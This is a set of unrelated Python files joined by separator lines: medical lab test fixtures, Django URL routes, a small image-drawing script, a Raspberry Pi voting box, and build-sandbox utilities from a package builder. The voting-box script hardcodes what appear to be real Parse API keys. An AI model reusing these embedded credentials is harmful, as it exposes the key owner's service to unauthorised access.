'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G4_TEST_13 = {'result_value': 8.944, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G4_TEST_14 = {'result_value': 9.159, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G4_TEST_15 = {'result_value': 9.544, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G4_TEST_16 = {'result_value': 8.000, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
"Test Cases End-HEMOGLOBIN"
TRUE_G1_ASSERTIONS = [
G1_TEST_2, G1_TEST_3, G1_TEST_5, G1_TEST_9, G1_TEST_8, G1_TEST_11,
G1_TEST_26, G1_TEST_27, G1_TEST_29, G1_TEST_14, G1_TEST_15, G1_TEST_17,
G1_TEST_20, G1_TEST_21, G1_TEST_23]
FALSE_G1_ASSERTIONS = [
G1_TEST_1, G1_TEST_4, G1_TEST_6, G1_TEST_10, G1_TEST_12, G1_TEST_7,
G1_TEST_25, G1_TEST_28, G1_TEST_30, G1_TEST_13, G1_TEST_16, G1_TEST_18,
G1_TEST_19, G1_TEST_22, G1_TEST_24]
TRUE_G2_ASSERTIONS = [
G2_TEST_2, G2_TEST_3, G2_TEST_5, G2_TEST_8, G2_TEST_11, G2_TEST_9,
G2_TEST_26, G2_TEST_27, G2_TEST_29, G2_TEST_14, G2_TEST_15, G2_TEST_17,
G2_TEST_20, G2_TEST_21, G2_TEST_23]
FALSE_G2_ASSERTIONS = [
G2_TEST_1, G2_TEST_4, G2_TEST_6, G2_TEST_10, G2_TEST_12, G2_TEST_7,
G2_TEST_25, G2_TEST_28, G2_TEST_30, G2_TEST_13, G2_TEST_16, G2_TEST_18,
G2_TEST_19, G2_TEST_22, G2_TEST_24]
TRUE_G3_ASSERTIONS = [
G3_TEST_2, G3_TEST_3, G3_TEST_5, G3_TEST_11, G3_TEST_9, G3_TEST_26,
G3_TEST_27, G3_TEST_29, G3_TEST_15, G3_TEST_17, G3_TEST_21, G3_TEST_23,
G3_TEST_8, G3_TEST_14, G3_TEST_20] #
FALSE_G3_ASSERTIONS = [
G3_TEST_1, G3_TEST_4, G3_TEST_6, G3_TEST_7, G3_TEST_10, G3_TEST_12,
G3_TEST_25, G3_TEST_28, G3_TEST_30, G3_TEST_13, G3_TEST_16, G3_TEST_18,
G3_TEST_19, G3_TEST_22, G3_TEST_24]
TRUE_G4_ASSERTIONS = [
G4_TEST_1, G4_TEST_4, G4_TEST_9, G4_TEST_5, G4_TEST_8, G4_TEST_17, G4_TEST_20,
G4_TEST_12, G4_TEST_13, G4_TEST_16]
FALSE_G4_ASSERTIONS = [
G4_TEST_2, G4_TEST_3, G4_TEST_7, G4_TEST_6, G4_TEST_18, G4_TEST_19, G4_TEST_10,
G4_TEST_11, G4_TEST_14, G4_TEST_15]
|
"""
Copyright 2016, 2017 UFPE - Universidade Federal de Pernambuco
Este arquivo é parte do programa Amadeus Sistema de Gestão de Aprendizagem, ou simplesmente Amadeus LMS
O Amadeus LMS é um software livre; você pode redistribui-lo e/ou modifica-lo dentro dos termos da Licença Pública Geral GNU como publicada pela Fundação do Software Livre (FSF); na versão 2 da Licença.
Este programa é distribuído na esperança que possa ser útil, mas SEM NENHUMA GARANTIA; sem uma garantia implícita de ADEQUAÇÃO a qualquer MERCADO ou APLICAÇÃO EM PARTICULAR. Veja a Licença Pública Geral GNU para maiores detalhes.
Você deve ter recebido uma cópia da Licença Pública Geral GNU, sob o título "LICENSE", junto com este programa, se não, escreva para a Fundação do Software Livre (FSF) Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
"""
from django.conf.urls import url
from django.contrib.auth import views as auth_views
from . import views
urlpatterns = [
url(r'^create/(?P<slug>[\w_-]+)/$', views.CreateView.as_view(), name = 'create'),
url(r'^update/(?P<topic_slug>[\w_-]+)/(?P<slug>[\w_-]+)/$', views.UpdateView.as_view(), name = 'update'),
url(r'^delete/(?P<slug>[\w_-]+)/$', views.DeleteView.as_view(), name = 'delete'),
url(r'^window_view/(?P<slug>[\w_-]+)/$', views.NewWindowView.as_view(), name = 'window_view'),
url(r'^view/(?P<slug>[\w_-]+)/$', views.InsideView.as_view(), name = 'view'),
url(r'^chart/(?P<slug>[\w_-]+)/$', views.StatisticsView.as_view(), name = 'get_chart'),
url(r'^send-message/(?P<slug>[\w_-]+)/$', views.SendMessage.as_view(), name = 'send_message'),
]
|
f = open("krog.txt", 'w')
n = 50
center = n/2
for i in range(n):
for j in range(n):
if (i - center)**2 + (j - center)**2 <= center**2:
f.write('#')
else:
f.write('.')
f.write('\n')
f.close()
f = open("slika.ppm", 'w')
f.write("P3\n")
f.write("# asdf\n")
n = 255
f.write("{} {}\n".format(n, n))
f.write("255\n")
for i in range(n):
for j in range(n):
r = i
g = j
b = 0
f.write('{} {} {} '.format(r, g, b))
f.write('\n')
f.close()
|
import RPi.GPIO as GPIO
from Adafruit_CharLCD import Adafruit_CharLCD
from subprocess import *
from time import sleep, strftime
from datetime import datetime
import urllib
import urllib2
import json
boxId = 1
boxLatitude = 53.3430708
boxLongitude = -6.2747221
questionId = ""
question = ""
loop = False
lcd = Adafruit_CharLCD()
lcd.begin(16, 1)
redButton = 4
greenButton = 18
GPIO.setmode(GPIO.BCM)
GPIO.setup(redButton, GPIO.IN)
GPIO.setup(greenButton, GPIO.IN)
def requestQuestion():
global questionId, question
print("Requesting current question...")
params = urllib.urlencode({"where":json.dumps({"targetBox": str(boxId)}),"order":"startDate","limit":"1"})
req = urllib2.Request('https://api.parse.com/1/classes/Questions?%s' % params,
headers = { "X-Parse-Application-Id" : "UzuNpxqIsLJIH8c2IFdKo0ifGEkD95pu5AV5bBmf",
"X-Parse-REST-API-Key" : "OSxv3JZH59IyoXE2Fof5RnJGiKhIXMv3lAcdUwoG",
"Content-Type" : "application/json"
})
response = urllib2.urlopen(req)
responseData = json.load(response)
questionId = responseData["results"][0]["objectId"]
question = responseData["results"][0]["question"]
print("Question received! current question is: " + question + " with ID: " + questionId)
mainLoop()
def sendResponse(response):
responseStr = "true"
responseLabel = "YES"
if response == False:
responseStr = "false"
responseLabel = "NO"
print("New response: " + responseLabel)
req = urllib2.Request("https://api.parse.com/1/classes/Responses",
headers = { "X-Parse-Application-Id" : "UzuNpxqIsLJIH8c2IFdKo0ifGEkD95pu5AV5bBmf",
"X-Parse-REST-API-Key" : "OSxv3JZH59IyoXE2Fof5RnJGiKhIXMv3lAcdUwoG",
"Content-Type" : "application/json"
},
data = '{"question":{"__type": "Pointer", "className": "Questions", "objectId": "' + questionId + '"}, "response":' + responseStr + ', "deviceType":"box", "deviceId":"' + str(boxId) + '", "location": {"__type": "GeoPoint", "latitude":'+ str(boxLatitude) +',"longitude": '+ str(boxLongitude) +'}}')
f = urllib2.urlopen(req)
print("Response sent!")
lcd.clear()
lcd.message("Response sent:\n" + responseLabel)
sleep(1.5)
mainLoop()
def mainLoop():
global loop
loop = True
lcd.clear()
if len(question) > 16:
lcd.message(question[:16] + "\n" + question[16:])
else :
lcd.message(question)
try:
while loop:
if GPIO.input(redButton):
#print "RED button is 1/GPIO.HIGH/True"
loop = False
sendResponse(False)
if GPIO.input(greenButton):
#print "GREEN button is 1/GPIO.HIGH/True"
loop = False
sendResponse(True)
sleep(1)
except KeyboardInterrupt:
print "\n Program stopped by user\n"
#except:
#print "\n Unknown exception occurred\n"
finally:
GPIO.cleanup()
requestQuestion()
|
from __future__ import print_function
from ast import literal_eval
import ctypes
import errno
import fcntl
from glob import glob
import grp
import locale
import logging
import os
import os.path
import pickle
import pwd
import re
import select
import signal
import socket
import stat
import struct
import subprocess
import sys
import termios
from textwrap import dedent
import time
import uuid
import distro
from . import exception
from .trace_decorator import getLog, traceLog
from .uid import getresuid, setresuid
encoding = locale.getpreferredencoding()
try:
# pylint: disable=used-before-assignment
basestring = basestring
except NameError:
basestring = str
_libc = ctypes.cdll.LoadLibrary(None)
_libc.personality.argtypes = [ctypes.c_ulong]
_libc.personality.restype = ctypes.c_int
_libc.unshare.argtypes = [ctypes.c_int]
_libc.unshare.restype = ctypes.c_int
_libc.sethostname.argtypes = [ctypes.c_char_p, ctypes.c_int]
_libc.sethostname.restype = ctypes.c_int
CLONE_NEWNS = 0x00020000
CLONE_NEWUTS = 0x04000000
CLONE_NEWPID = 0x20000000
CLONE_NEWNET = 0x40000000
CLONE_NEWIPC = 0x08000000
PER_LINUX32 = 0x0008
PER_LINUX = 0x0000
personality_defs = {
'x86_64': PER_LINUX, 'ppc64': PER_LINUX, 'sparc64': PER_LINUX,
'i386': PER_LINUX32, 'i586': PER_LINUX32, 'i686': PER_LINUX32,
'ppc': PER_LINUX32, 'sparc': PER_LINUX32, 'sparcv9': PER_LINUX32,
'ia64': PER_LINUX, 'alpha': PER_LINUX,
's390': PER_LINUX32, 's390x': PER_LINUX,
'mips': PER_LINUX32, 'mipsel': PER_LINUX32,
'mipsr6': PER_LINUX32, 'mipsr6el': PER_LINUX32,
'mips64': PER_LINUX, 'mips64el': PER_LINUX,
'mips64r6': PER_LINUX, 'mips64r6el': PER_LINUX,
}
PLUGIN_LIST = ['tmpfs', 'root_cache', 'yum_cache', 'bind_mount',
'ccache', 'selinux', 'package_state', 'chroot_scan',
'lvm_root', 'compress_logs', 'sign', 'pm_request',
'hw_info']
USE_NSPAWN = False
class commandTimeoutExpired(exception.Error):
def __init__(self, msg):
exception.Error.__init__(self, msg)
self.msg = msg
self.resultcode = 10
@traceLog()
def get_proxy_environment(config):
env = {}
for proto in ('http', 'https', 'ftp', 'no'):
key = '%s_proxy' % proto
value = config.get(key)
if value:
env[key] = value
return env
@traceLog()
def mkdirIfAbsent(*args):
for dirName in args:
getLog().debug("ensuring that dir exists: %s", dirName)
if not os.path.exists(dirName):
try:
getLog().debug("creating dir: %s", dirName)
os.makedirs(dirName)
except OSError as e:
if e.errno != errno.EEXIST:
getLog().exception("Could not create dir %s. Error: %s", dirName, e)
raise exception.Error("Could not create dir %s. Error: %s" % (dirName, e))
@traceLog()
def touch(fileName):
getLog().debug("touching file: %s", fileName)
open(fileName, 'a').close()
@traceLog()
def rmtree(path, selinux=False, exclude=()):
"""Version of shutil.rmtree that ignores no-such-file-or-directory errors,
tries harder if it finds immutable files and supports excluding paths"""
if os.path.islink(path):
raise OSError("Cannot call rmtree on a symbolic link")
try_again = True
retries = 0
failed_to_handle = False
failed_filename = None
if path in exclude:
return
while try_again:
try_again = False
try:
names = os.listdir(path)
for name in names:
fullname = os.path.join(path, name)
if fullname not in exclude:
try:
mode = os.lstat(fullname).st_mode
except OSError:
mode = 0
if stat.S_ISDIR(mode):
try:
rmtree(fullname, selinux=selinux, exclude=exclude)
except OSError as e:
if e.errno in (errno.EPERM, errno.EACCES, errno.EBUSY):
# we alrady tried handling this on lower level and failed,
# there's no point in trying again now
failed_to_handle = True
raise
else:
os.remove(fullname)
os.rmdir(path)
except OSError as e:
if failed_to_handle:
raise
if e.errno == errno.ENOENT: # no such file or directory
pass
elif exclude and e.errno == errno.ENOTEMPTY: # there's something excluded left
pass
elif selinux and (e.errno == errno.EPERM or e.errno == errno.EACCES):
try_again = True
if failed_filename == e.filename:
raise
failed_filename = e.filename
os.system("chattr -R -i %s" % path)
elif e.errno == errno.EBUSY:
retries += 1
if retries > 1:
raise
try_again = True
getLog().debug("retrying failed tree remove after sleeping a bit")
time.sleep(2)
else:
raise
@traceLog()
def orphansKill(rootToKill, killsig=signal.SIGTERM):
"""kill off anything that is still chrooted."""
getLog().debug("kill orphans")
if USE_NSPAWN is False:
for fn in [d for d in os.listdir("/proc") if d.isdigit()]:
try:
root = os.readlink("/proc/%s/root" % fn)
if os.path.realpath(root) == os.path.realpath(rootToKill):
getLog().warning("Process ID %s still running in chroot. Killing...", fn)
pid = int(fn, 10)
os.kill(pid, killsig)
os.waitpid(pid, 0)
except OSError:
pass
else:
# RHEL7 does not know --no-legend, so we must filter the legend out
vm_list = subprocess.check_output(["/usr/bin/machinectl", "list", "--no-pager"])
if (isinstance(vm_list, bytes)):
vm_list = vm_list.decode("utf-8")
vm_list = '\n'.join(vm_list.split('\n')[1:-2])
for name in vm_list.split("\n"):
if len(name) > 0:
m_uuid = name.split()[0]
try:
vm_root = subprocess.check_output(["/usr/bin/machinectl", "show", "-pRootDirectory", m_uuid])
if (isinstance(vm_root, bytes)):
vm_root = vm_root.decode("utf-8")
except subprocess.CalledProcessError:
continue
vm_root = '='.join(vm_root.rstrip().split('=')[1:])
if vm_root == rootToKill:
getLog().warning("Machine %s still running. Killing...", m_uuid)
os.system("/usr/bin/machinectl terminate %s" % m_uuid)
@traceLog()
def yieldSrpmHeaders(srpms, plainRpmOk=0):
import rpm
ts = rpm.TransactionSet('/')
flags = (rpm._RPMVSF_NOSIGNATURES | rpm._RPMVSF_NODIGESTS)
ts.setVSFlags(flags)
for srpm in srpms:
try:
fd = os.open(srpm, os.O_RDONLY)
except OSError as e:
raise exception.Error("Cannot find/open srpm: %s. Error: %s"
% (srpm, e))
try:
hdr = ts.hdrFromFdno(fd)
except rpm.error as e:
raise exception.Error(
"Cannot find/open srpm: %s. Error: %s" % (srpm, e))
finally:
os.close(fd)
if not plainRpmOk and hdr[rpm.RPMTAG_SOURCEPACKAGE] != 1:
raise exception.Error("File is not an srpm: %s." % srpm)
yield hdr
@traceLog()
def checkSrpmHeaders(srpms, plainRpmOk=0):
for dummy in yieldSrpmHeaders(srpms, plainRpmOk):
pass
@traceLog()
def getNEVRA(hdr):
import rpm
name = hdr[rpm.RPMTAG_NAME]
ver = hdr[rpm.RPMTAG_VERSION]
rel = hdr[rpm.RPMTAG_RELEASE]
epoch = hdr[rpm.RPMTAG_EPOCH]
arch = hdr[rpm.RPMTAG_ARCH]
if epoch is None:
epoch = 0
ret = (name, epoch, ver, rel, arch)
return tuple(x.decode() if i != 1 else x for i, x in enumerate(ret))
@traceLog()
def cmpKernelVer(str1, str2):
'compare two kernel version strings and return -1, 0, 1 for less, equal, greater'
import rpm
return rpm.labelCompare(('', str1, ''), ('', str2, ''))
@traceLog()
def getAddtlReqs(hdr, conf):
# Add the 'more_buildreqs' for this SRPM (if defined in config file)
# pylint: disable=unused-variable
(name, epoch, ver, rel, arch) = getNEVRA(hdr)
reqlist = []
for this_srpm in ['-'.join([name, ver, rel]),
'-'.join([name, ver]),
'-'.join([name])]:
if this_srpm in conf:
more_reqs = conf[this_srpm]
if isinstance(more_reqs, basestring):
reqlist.append(more_reqs)
else:
reqlist.extend(more_reqs)
break
return set(reqlist)
@traceLog()
def unshare(flags):
getLog().debug("Unsharing. Flags: %s", flags)
try:
res = _libc.unshare(flags)
if res:
raise exception.UnshareFailed(os.strerror(ctypes.get_errno()))
except AttributeError:
pass
def sethostname(hostname):
getLog().info("Setting hostname: %s", hostname)
hostname = hostname.encode('utf-8')
if _libc.sethostname(hostname, len(hostname)) != 0:
raise OSError('Failed to sethostname %s' % hostname)
def condChroot(chrootPath):
if chrootPath is not None:
saved = {"ruid": os.getuid(), "euid": os.geteuid()}
setresuid(0, 0, 0)
os.chdir(chrootPath)
os.chroot(chrootPath)
setresuid(saved['ruid'], saved['euid'])
def condChdir(cwd):
if cwd is not None:
os.chdir(cwd)
def condDropPrivs(uid, gid):
if gid is not None:
os.setregid(gid, gid)
if uid is not None:
os.setreuid(uid, uid)
def condPersonality(per=None):
if per is None or per in ('noarch',):
return
if personality_defs.get(per, None) is None:
return
res = _libc.personality(personality_defs[per])
if res == -1:
raise OSError(ctypes.get_errno(), os.strerror(ctypes.get_errno()))
def condEnvironment(env=None):
if not env:
return
os.environ.clear()
for k in list(env.keys()):
os.putenv(k, env[k])
def condUnshareIPC(unshare_ipc=True):
if unshare_ipc:
try:
unshare(CLONE_NEWIPC)
except exception.UnshareFailed:
# IPC and UTS ns are supported since the same kernel version. If this
# fails, there had to be a warning already
pass
def process_input(line):
out = []
for char in line.rstrip('\r'):
if char == '\r':
out = []
elif char == '\b':
out.pop()
else:
out.append(char)
return ''.join(out)
def logOutput(fds, logger, returnOutput=1, start=0, timeout=0, printOutput=False,
child=None, chrootPath=None, pty=False):
output = ""
done = False
# set all fds to nonblocking
for fd in fds:
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
if not fd.closed:
fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
mockbuild_logger = logging.getLogger('mockbuild')
stored_propagate = mockbuild_logger.propagate
if printOutput:
# prevent output being printed twice when log propagates to stdout
mockbuild_logger.propagate = 0
sys.stdout.flush()
try:
tail = ""
ansi_escape = re.compile(r'\x1b\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]\x0f?')
while not done:
if (time.time() - start) > timeout and timeout != 0:
done = True
break
i_rdy, o_rdy, e_rdy = select.select(fds, [], [], 1)
if not i_rdy and not o_rdy and not e_rdy:
if child and child.poll() is not None:
logger.info("Child pid '%s' is dead", child.pid)
done = True
if chrootPath:
logger.info("Child dead, killing orphans")
orphansKill(chrootPath)
continue
for s in i_rdy:
# slurp as much input as is ready
raw = s.read()
if not raw:
done = True
break
if printOutput:
if hasattr(sys.stdout, 'buffer'):
# python3 would print binary strings ugly
# pylint: disable=no-member
sys.stdout.buffer.write(raw)
else:
print(raw, end='')
sys.stdout.flush()
txt_input = raw.decode(encoding, 'replace')
lines = txt_input.split("\n")
if tail:
lines[0] = tail + lines[0]
# we may not have all of the last line
tail = lines.pop()
if not lines:
continue
if pty:
lines = [process_input(line) for line in lines]
processed_input = '\n'.join(lines) + '\n'
if logger is not None:
for line in lines:
if line != '':
line = ansi_escape.sub('', line)
logger.debug(line)
for h in logger.handlers:
h.flush()
if returnOutput:
output += processed_input
if tail:
if pty:
tail = process_input(tail) + '\n'
if logger is not None:
logger.debug(tail)
if returnOutput:
output += tail
finally:
mockbuild_logger.propagate = stored_propagate
return output
@traceLog()
def selinuxEnabled():
"""Check if SELinux is enabled (enforcing or permissive)."""
with open("/proc/mounts") as f:
for mount in f.readlines():
(fstype, mountpoint, _) = mount.split(None, 2)
if fstype == "selinuxfs":
selinux_mountpoint = mountpoint
break
else:
selinux_mountpoint = "/selinux"
try:
enforce_filename = os.path.join(selinux_mountpoint, "enforce")
with open(enforce_filename) as f:
if f.read().strip() in ("1", "0"):
return True
except:
pass
return False
def resize_pty(pty):
try:
winsize = struct.pack('HHHH', 0, 0, 0, 0)
winsize = fcntl.ioctl(sys.stdout.fileno(), termios.TIOCGWINSZ, winsize)
fcntl.ioctl(pty, termios.TIOCSWINSZ, winsize)
except IOError:
# Nice to have, but not necessary
pass
@traceLog()
def do(command, shell=False, chrootPath=None, cwd=None, timeout=0, raiseExc=True,
returnOutput=0, uid=None, gid=None, user=None, personality=None,
printOutput=False, env=None, pty=False, nspawn_args=[],
*args, **kargs):
logger = kargs.get("logger", getLog())
output = ""
start = time.time()
if pty:
master_pty, slave_pty = os.openpty()
resize_pty(slave_pty)
reader = os.fdopen(master_pty, 'rb')
preexec = ChildPreExec(personality, chrootPath, cwd, uid, gid, unshare_ipc=bool(chrootPath))
if env is None:
env = clean_env()
stdout = None
try:
child = None
if shell and isinstance(command, list):
command = ['/bin/sh', '-c'] + command
shell = False
if chrootPath and USE_NSPAWN:
command = _prepare_nspawn_command(chrootPath, user, command,
nspawn_args=nspawn_args, env=env, cwd=cwd)
logger.debug("Executing command: %s with env %s and shell %s", command, env, shell)
with open(os.devnull, "r") as stdin:
child = subprocess.Popen(
command,
shell=shell,
env=env,
bufsize=0, close_fds=True,
stdin=stdin,
stdout=slave_pty if pty else subprocess.PIPE,
stderr=subprocess.PIPE,
preexec_fn=preexec,
)
if not pty:
stdout = child.stdout
with child.stderr:
# use select() to poll for output so we dont block
output = logOutput(
[reader if pty else child.stdout, child.stderr],
logger, returnOutput, start, timeout, pty=pty,
printOutput=printOutput, child=child,
chrootPath=chrootPath)
except:
# kill children if they arent done
if child is not None and child.returncode is None:
os.killpg(child.pid, 9)
try:
if child is not None:
os.waitpid(child.pid, 0)
except:
pass
raise
finally:
if pty:
os.close(slave_pty)
reader.close()
if stdout:
stdout.close()
# wait until child is done, kill it if it passes timeout
niceExit = 1
while child.poll() is None:
if (time.time() - start) > timeout and timeout != 0:
niceExit = 0
os.killpg(child.pid, 15)
if (time.time() - start) > (timeout + 1) and timeout != 0:
niceExit = 0
os.killpg(child.pid, 9)
# only logging from this point, convert command to string
if isinstance(command, list):
command = ' '.join(command)
if not niceExit:
raise commandTimeoutExpired("Timeout(%s) expired for command:\n # %s\n%s" % (timeout, command, output))
logger.debug("Child return code was: %s", child.returncode)
if raiseExc and child.returncode:
if returnOutput:
raise exception.Error("Command failed: \n # %s\n%s" % (command, output), child.returncode)
else:
raise exception.Error("Command failed. See logs for output.\n # %s" % (command,), child.returncode)
return output
class ChildPreExec(object):
def __init__(self, personality, chrootPath, cwd, uid, gid, env=None,
shell=False, unshare_ipc=False):
self.personality = personality
self.chrootPath = chrootPath
self.cwd = cwd
self.uid = uid
self.gid = gid
self.env = env
self.shell = shell
self.unshare_ipc = unshare_ipc
getLog().debug("child environment: %s", env)
def __call__(self, *args, **kargs):
if not self.shell:
os.setsid()
os.umask(0o02)
condPersonality(self.personality)
condEnvironment(self.env)
if not USE_NSPAWN:
condChroot(self.chrootPath)
condDropPrivs(self.uid, self.gid)
condChdir(self.cwd)
condUnshareIPC(self.unshare_ipc)
reset_sigpipe()
def reset_sigpipe():
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
def is_in_dir(path, directory):
"""Tests whether `path` is inside `directory`."""
# use realpath to expand symlinks
path = os.path.realpath(path)
directory = os.path.realpath(directory)
return os.path.commonprefix([path, directory]) == directory
def _prepare_nspawn_command(chrootPath, user, cmd, nspawn_args=[], env=None, cwd=None):
cmd_is_list = isinstance(cmd, list)
if user:
# user can be either id or name
if cmd_is_list:
cmd = ['-u', str(user)] + cmd
else:
raise exception.Error('Internal Error: command must be list or shell=True.')
elif not cmd_is_list:
cmd = [cmd]
nspawn_argv = ['/usr/bin/systemd-nspawn', '-q', '-M', uuid.uuid4().hex, '-D', chrootPath]
distro_label = distro.linux_distribution(full_distribution_name=False)[0]
if (distro_label != 'centos') and (distro_label != 'rhel'):
# EL7 does not support it (yet). See BZ 1417387
nspawn_argv += ['-a']
nspawn_argv.extend(nspawn_args)
if cwd:
nspawn_argv.append('--chdir={0}'.format(cwd))
if env:
# BZ 1312384 workaround
env['PROMPT_COMMAND'] = r'printf "\033]0;<mock-chroot>\007"'
env['PS1'] = r'<mock-chroot> \s-\v\$ '
for k, v in env.items():
nspawn_argv.append('--setenv={0}={1}'.format(k, v))
cmd = nspawn_argv + cmd
if cmd_is_list:
return cmd
else:
return " ".join(cmd)
def doshell(chrootPath=None, environ=None, uid=None, gid=None, cmd=None,
nspawn_args=[],
unshare_ipc=True):
log = getLog()
log.debug("doshell: chrootPath:%s, uid:%d, gid:%d", chrootPath, uid, gid)
if environ is None:
environ = clean_env()
if 'PROMPT_COMMAND' not in environ:
environ['PROMPT_COMMAND'] = r'printf "\033]0;<mock-chroot>\007"'
if 'PS1' not in environ:
environ['PS1'] = r'<mock-chroot> \s-\v\$ '
if 'SHELL' not in environ:
environ['SHELL'] = '/bin/sh'
log.debug("doshell environment: %s", environ)
if cmd:
if not isinstance(cmd, list):
cmd = [cmd]
cmd = ['/bin/sh', '-c'] + cmd
else:
cmd = ["/bin/sh", "-i", "-l"]
if USE_NSPAWN:
# nspawn cannot set gid
cmd = _prepare_nspawn_command(chrootPath, uid, cmd, nspawn_args=nspawn_args, env=environ)
preexec = ChildPreExec(personality=None, chrootPath=chrootPath, cwd=None,
uid=uid, gid=gid, env=environ, shell=True,
unshare_ipc=unshare_ipc)
log.debug("doshell: command: %s", cmd)
return subprocess.call(cmd, preexec_fn=preexec, env=environ, shell=False)
def run(cmd, isShell=True):
log = getLog()
log.debug("run: cmd = %s\n", cmd)
return subprocess.call(cmd, shell=isShell)
def clean_env():
env = {
'TERM': 'vt100',
'SHELL': '/bin/sh',
'HOME': '/builddir',
'HOSTNAME': 'mock',
'PATH': '/usr/bin:/bin:/usr/sbin:/sbin',
}
env['LANG'] = os.environ.setdefault('LANG', 'en_US.UTF-8')
return env
def get_fs_type(path):
cmd = ['/usr/bin/stat', '-f', '-L', '-c', '%T', path]
p = subprocess.Popen(cmd, shell=False, stdout=subprocess.PIPE,
universal_newlines=True)
p.wait()
with p.stdout as f:
return f.readline().strip()
def find_non_nfs_dir():
dirs = ('/dev/shm', '/run', '/tmp', '/usr/tmp', '/')
for d in dirs:
if not get_fs_type(d).startswith('nfs'):
return d
raise exception.Error('Cannot find non-NFS directory in: %s' % dirs)
@traceLog()
def setup_default_config_opts(unprivUid, version, pkgpythondir):
"sets up default configuration."
config_opts = {}
config_opts['version'] = version
config_opts['basedir'] = '/var/lib/mock' # root name is automatically added to this
config_opts['resultdir'] = '%(basedir)s/%(root)s/result'
config_opts['cache_topdir'] = '/var/cache/mock'
config_opts['clean'] = True
config_opts['check'] = True
config_opts['post_install'] = False
config_opts['chroothome'] = '/builddir'
config_opts['log_config_file'] = 'logging.ini'
config_opts['rpmbuild_timeout'] = 0
config_opts['chrootuid'] = unprivUid
try:
config_opts['chrootgid'] = grp.getgrnam("mock")[2]
except KeyError:
# 'mock' group doesn't exist, must set in config file
pass
config_opts['build_log_fmt_name'] = "unadorned"
config_opts['root_log_fmt_name'] = "detailed"
config_opts['state_log_fmt_name'] = "state"
config_opts['online'] = True
config_opts['use_nspawn'] = False
config_opts['rpmbuild_networking'] = False
config_opts['nspawn_args'] = []
config_opts['use_container_host_hostname'] = True
config_opts['internal_dev_setup'] = True
config_opts['internal_setarch'] = True
# cleanup_on_* only take effect for separate --resultdir
# config_opts provides fine-grained control. cmdline only has big hammer
config_opts['cleanup_on_success'] = True
config_opts['cleanup_on_failure'] = True
config_opts['exclude_from_homedir_cleanup'] = ['build/SOURCES', '.bash_history',
'.bashrc']
config_opts['createrepo_on_rpms'] = False
config_opts['createrepo_command'] = '/usr/bin/createrepo_c -d -q -x *.src.rpm' # default command
config_opts['backup_on_clean'] = False
config_opts['backup_base_dir'] = os.path.join(config_opts['basedir'], "backup")
# (global) plugins and plugin configs.
# ordering constraings: tmpfs must be first.
# root_cache next.
# after that, any plugins that must create dirs (yum_cache)
# any plugins without preinit hooks should be last.
config_opts['plugins'] = PLUGIN_LIST
config_opts['plugin_dir'] = os.path.join(pkgpythondir, "plugins")
config_opts['plugin_conf'] = {
'ccache_enable': False,
'ccache_opts': {
'max_cache_size': "4G",
'compress': None,
'dir': "%(cache_topdir)s/%(root)s/ccache/u%(chrootuid)s/"},
'yum_cache_enable': True,
'yum_cache_opts': {
'max_age_days': 30,
'max_metadata_age_days': 30,
'dir': "%(cache_topdir)s/%(root)s/%(package_manager)s_cache/",
'target_dir': "/var/cache/%(package_manager)s/",
'online': True},
'root_cache_enable': True,
'root_cache_opts': {
'age_check': True,
'max_age_days': 15,
'dir': "%(cache_topdir)s/%(root)s/root_cache/",
'compress_program': 'pigz',
'exclude_dirs': ["./proc", "./sys", "./dev", "./tmp/ccache", "./var/cache/yum", "./var/cache/dnf"],
'extension': '.gz'},
'bind_mount_enable': True,
'bind_mount_opts': {
'dirs': [
# specify like this:
# ('/host/path', '/bind/mount/path/in/chroot/' ),
# ('/another/host/path', '/another/bind/mount/path/in/chroot/'),
],
'create_dirs': False},
'mount_enable': True,
'mount_opts': {'dirs': [
# specify like this:
# ("/dev/device", "/mount/path/in/chroot/", "vfstype", "mount_options"),
]},
'tmpfs_enable': False,
'tmpfs_opts': {
'required_ram_mb': 900,
'max_fs_size': None,
'mode': '0755',
'keep_mounted': False},
'selinux_enable': True,
'selinux_opts': {},
'package_state_enable': False,
'package_state_opts': {
'available_pkgs': False,
'installed_pkgs': True,
},
'pm_request_enable': False,
'pm_request_opts': {},
'lvm_root_enable': False,
'lvm_root_opts': {
'pool_name': 'mockbuild',
},
'chroot_scan_enable': False,
'chroot_scan_opts': {
'regexes': [
"^[^k]?core(\\.\\d+)?$", "\\.log$",
],
'only_failed': True},
'sign_enable': False,
'sign_opts': {
'cmd': 'rpmsign',
'opts': '--addsign %(rpms)s',
},
'hw_info_enable': True,
'hw_info_opts': {
},
}
config_opts['environment'] = {
'TERM': 'vt100',
'SHELL': '/bin/bash',
'HOME': '/builddir',
'HOSTNAME': 'mock',
'PATH': '/usr/bin:/bin:/usr/sbin:/sbin',
'PROMPT_COMMAND': r'printf "\033]0;<mock-chroot>\007"',
'PS1': r'<mock-chroot> \s-\v\$ ',
'LANG': os.environ.setdefault('LANG', 'en_US.UTF-8'),
}
runtime_plugins = [runtime_plugin
for (runtime_plugin, _)
in [os.path.splitext(os.path.basename(tmp_path))
for tmp_path
in glob(config_opts['plugin_dir'] + "/*.py")]
if runtime_plugin not in config_opts['plugins']]
for runtime_plugin in sorted(runtime_plugins):
config_opts['plugins'].append(runtime_plugin)
config_opts['plugin_conf'][runtime_plugin + "_enable"] = False
config_opts['plugin_conf'][runtime_plugin + "_opts"] = {}
# SCM defaults
config_opts['scm'] = False
config_opts['scm_opts'] = {
'method': 'git',
'cvs_get': 'cvs -d /srv/cvs co SCM_BRN SCM_PKG',
